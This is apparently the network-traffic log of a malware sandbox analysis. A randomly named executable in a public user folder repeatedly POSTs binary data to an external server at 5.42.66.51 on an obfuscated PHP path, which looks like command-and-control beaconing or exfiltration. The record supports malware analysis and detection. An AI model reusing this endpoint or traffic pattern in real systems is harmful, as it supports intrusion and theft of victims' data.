                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:22.123220921 CEST | 2552 | OUT | Request body
Oct 11, 2024 20:38:22.458251953 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:22.587789059 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:22 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50018 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:22.508526087 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2128
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:22.857636929 CEST | 2128 | OUT | request body
                                                                                                Oct 11, 2024 20:38:26.221218109 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:26.380939007 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:26 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                34 | 192.168.2.5 | 50019 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:22.741631985 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:23.091861963 CEST | 2552 | OUT | request body
                                                                                                Oct 11, 2024 20:38:26.455749989 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:26.599823952 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:26 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                35 | 192.168.2.5 | 50020 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:26.894817114 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:27.248275042 CEST | 2552 | OUT | request body
                                                                                                Oct 11, 2024 20:38:27.572762966 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:27.703151941 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:27 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                36 | 192.168.2.5 | 50021 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:27.398423910 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:27.755017042 CEST | 2156 | OUT | request body
                                                                                                Oct 11, 2024 20:38:28.083930969 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:28.212970972 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:27 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Oct 11, 2024 20:38:28.229811907 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:28.443336964 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:28.443582058 CEST | 2552 | OUT | request body
                                                                                                Oct 11, 2024 20:38:28.775456905 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                37 | 192.168.2.5 | 50022 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:28.947490931 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:29.295125008 CEST | 2552 | OUT | request body
                                                                                                Oct 11, 2024 20:38:29.631477118 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:29.759079933 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:29 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                38 | 192.168.2.5 | 50023 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:29.236041069 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:29.591950893 CEST | 2156 | OUT | request body
                                                                                                Oct 11, 2024 20:38:29.938611984 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:30.071259022 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:29 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                39 | 192.168.2.5 | 50024 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:29.945889950 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:30.295219898 CEST | 2552 | OUT | request body
                                                                                                Oct 11, 2024 20:38:30.690289974 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:30.825090885 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:30 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                40 | 192.168.2.5 | 50025 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:31.011518955 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                41 | 192.168.2.5 | 50026 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:31.086966991 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:31.439220905 CEST | 2156 | OUT | request body
Oct 11, 2024 20:38:31.776782990 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:31.903361082 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 50027 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:31.229310036 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
Oct 11, 2024 20:38:31.578094006 CEST | 2552 | OUT | Data (request body)
Oct 11, 2024 20:38:31.941895962 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:32.059052944 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 50028 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:32.240073919 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:32.592092991 CEST | 2552 | OUT | Data (request body)
Oct 11, 2024 20:38:32.951159954 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:33.083218098 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:32 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50029 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:32.921540976 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2140
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:33.279489994 CEST | 2140 | OUT | Data (request body)
Oct 11, 2024 20:38:33.617772102 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:33.755724907 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:33 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 50030 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:33.230432034 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2548
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:33.577200890 CEST | 2548 | OUT | Data (request body)
Oct 11, 2024 20:38:33.935823917 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:34.078910112 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:33 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 50031 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:34.251848936 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:34.607618093 CEST | 2552 | OUT | Data (request body)
Oct 11, 2024 20:38:34.949815989 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:35.080893993 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:34 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 50032 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:34.769776106 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2140
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:35.123198986 CEST | 2140 | OUT | Data (request body)
Oct 11, 2024 20:38:35.466171026 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:35.598938942 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 50033 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:35.219871998 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:35.576314926 CEST | 2552 | OUT | Data (request body)
Oct 11, 2024 20:38:35.898169994 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:36.027194977 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 50034 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:36.259574890 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:36.623825073 CEST | 2552 | OUT | Data (request body)
Oct 11, 2024 20:38:36.963489056 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:37.095158100 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:36 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 50035 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:36.645514011 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:37.349616051 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:37.487339973 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:37 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                51 | 192.168.2.5 | 50036 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:37.430051088 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:38.114505053 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:38.243510008 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:38 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                52 | 192.168.2.5 | 50037 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:38.507783890 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:39.290798903 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:39.319175005 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
